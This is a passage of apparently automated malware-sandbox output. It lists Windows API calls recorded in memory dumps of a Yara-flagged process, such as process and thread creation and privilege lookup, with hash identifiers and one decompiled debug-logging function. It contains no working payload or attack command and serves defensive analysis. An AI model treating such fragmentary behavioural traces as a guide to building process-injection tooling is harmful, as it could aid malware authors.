                    • API String ID: 2186235152-0
                    • Opcode ID: fc6953d97ff36295c7e086f71de5bacc25086dd88da18cc2a475c80f97768068
                    • Instruction ID: 2d7ca4d6877a403f6340cd463619db092a3af1bfdd998132b8e6a9bee4b75af1
                    • Opcode Fuzzy Hash: fc6953d97ff36295c7e086f71de5bacc25086dd88da18cc2a475c80f97768068
                    • Instruction Fuzzy Hash: 6601B2B6210108BFCB58DF89DC80EEB37ADAF8C754F158258FA0D97241D630E851CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0074A734
                    Memory Dump Source
                    • Source File: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Offset: 00730000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: CreateInternalProcess
                    • String ID:
                    • API String ID: 2186235152-0
                    • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                    • Instruction ID: 2708e786ce593e29cc247d498e95647d001d79f70a8fb856a2a08f3aadc0d08b
                    • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                    • Instruction Fuzzy Hash: AD01B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0073F050,?,?,00000000), ref: 007491EC
                    Memory Dump Source
                    • Source File: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Offset: 00730000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: CreateThread
                    • String ID:
                    • API String ID: 2422867632-0
                    • Opcode ID: 99fcb9b7b30df4d86e90b5a4a83c6d9f27f324d9dc8e82fa5e5eb4eedb0108d3
                    • Instruction ID: 4d5351a3c1a136ed8db88bd6d1f44ed6194f587b97c6446a16ba601fed3eb784
                    • Opcode Fuzzy Hash: 99fcb9b7b30df4d86e90b5a4a83c6d9f27f324d9dc8e82fa5e5eb4eedb0108d3
                    • Instruction Fuzzy Hash: EFE092373803143AE7306599AC03FA7B39CDB81B20F150026FB0DEB2C1DA99F80142A4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,0073F1D2,0073F1D2,?,00000000,?,?), ref: 0074A800
                    Memory Dump Source
                    • Source File: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Offset: 00730000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: LookupPrivilegeValue
                    • String ID:
                    • API String ID: 3899507212-0
                    • Opcode ID: 0034b921cad3509e1da8d1c3c716ebd43afd0bc3422e406f5bbdda511977349e
                    • Instruction ID: e8b1d0b983af557d4cee847c2b8208da28228e2678d725d198ef84c9f6e3ae1c
                    • Opcode Fuzzy Hash: 0034b921cad3509e1da8d1c3c716ebd43afd0bc3422e406f5bbdda511977349e
                    • Instruction Fuzzy Hash: FFF0A0B52412046BD714DF54DC45FE73B68AF89650F148054FE5817342D634E915CBF1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,0073F1D2,0073F1D2,?,00000000,?,?), ref: 0074A800
                    Memory Dump Source
                    • Source File: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Offset: 00730000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: LookupPrivilegeValue
                    • String ID:
                    • API String ID: 3899507212-0
                    • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                    • Instruction ID: 2b76034b8ed27a3dad0bfb013d42776221ac615600e4bc72d4cee1396f4a9d03
                    • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                    • Instruction Fuzzy Hash: FEE01AB1200208ABDB10DF49CC85EE737ADEF88650F118154BE0857241CA34E8158BF5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SetErrorMode.KERNELBASE(00008003,?,00738D14,?), ref: 0073F6FB
                    Memory Dump Source
                    • Source File: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Offset: 00730000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: ErrorMode
                    • String ID:
                    • API String ID: 2340568224-0
                    • Opcode ID: af3271f7095da5b9fb2ec9f8a82c81fc53fa62a90eaa16ba70667aa399b5de3e
                    • Instruction ID: 4b138b55ac391b4346cf763c191823a5d023793878efa434d8de49850eaac132
                    • Opcode Fuzzy Hash: af3271f7095da5b9fb2ec9f8a82c81fc53fa62a90eaa16ba70667aa399b5de3e
                    • Instruction Fuzzy Hash: F6E0C232B403047BEB14EFB09C03F663394AF58B40F1A0078F54DD72D3EA65D1018610
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SetErrorMode.KERNELBASE(00008003,?,00738D14,?), ref: 0073F6FB
                    Memory Dump Source
                    • Source File: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, Offset: 00730000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: ErrorMode
                    • String ID:
                    • API String ID: 2340568224-0
                    • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                    • Instruction ID: 005d222395bbfb5faeeeb7da80c4fe2e7f94eaf0067cce7b80af1e999684f808
                    • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                    • Instruction Fuzzy Hash: 95D05E616503086AE710AAA49C07F2632886B44B40F4A0064F948962C3D964E4004165
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: true
                    • Associated: 00000018.00000002.548420844.000000000333B000.00000040.00000001.sdmp
                    • Associated: 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 2399832bf5a8df2b4c33733f9d29325652aaa387935d5099e359e971df2e67d1
                    • Instruction ID: de5e2ddce00f569e00a816d44df6d413073d215a05126c55390a7f50776abc8c
                    • Opcode Fuzzy Hash: 2399832bf5a8df2b4c33733f9d29325652aaa387935d5099e359e971df2e67d1
                    • Instruction Fuzzy Hash: 57B09B719124D5C5EA11E7704708737790477D0741F16C052D1020645A4778C4D1F5B5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    C-Code - Quality: 53%
                    			E032DFDDA(intOrPtr* __edx, intOrPtr _a4) {
                    				void* _t7;
                    				intOrPtr _t9;
                    				intOrPtr _t10;
                    				intOrPtr* _t12;
                    				intOrPtr* _t13;
                    				intOrPtr _t14;
                    				intOrPtr* _t15;
                    
                    				_t13 = __edx;
                    				_push(_a4);
                    				_t14 =  *[fs:0x18];
                    				_t15 = _t12;
                    				_t7 = E0328CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                    				_push(_t13);
                    				E032D5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                    				_t9 =  *_t15;
                    				if(_t9 == 0xffffffff) {
                    					_t10 = 0;
                    				} else {
                    					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                    				}
                    				_push(_t10);
                    				_push(_t15);
                    				_push( *((intOrPtr*)(_t15 + 0xc)));
                    				_push( *((intOrPtr*)(_t14 + 0x24)));
                    				return E032D5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                    			}

                    Statement addresses: 0x032dfdda, 0x032dfde2, 0x032dfde5, 0x032dfdec, 0x032dfdfa, 0x032dfdff, 0x032dfe0a, 0x032dfe0f, 0x032dfe17, 0x032dfe1e, 0x032dfe19, 0x032dfe19, 0x032dfe19, 0x032dfe20, 0x032dfe21, 0x032dfe22, 0x032dfe25, 0x032dfe40

                    APIs
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 032DFDFA
                    Strings
                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 032DFE2B
                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 032DFE01
                    Memory Dump Source
                    • Source File: 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: true
                    • Associated: 00000018.00000002.548420844.000000000333B000.00000040.00000001.sdmp
                    • Associated: 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                    • API String ID: 885266447-3903918235
                    • Opcode ID: 6627668d4fb2e6dd5844ee02775650c2936968732231bd8ecaa8cf7b1096304c
                    • Instruction ID: 637bd62ffc37a31a5e435fe30695d26eedb3d3b9baebf712db7896a7a219c7d2
                    • Opcode Fuzzy Hash: 6627668d4fb2e6dd5844ee02775650c2936968732231bd8ecaa8cf7b1096304c
                    • Instruction Fuzzy Hash: 0DF0F676210301BFE6249A45DC02F23BB5AEB45730F244314F6285A5D1DAA2F8A086F4
                    Uniqueness

                    Uniqueness Score: -1.00%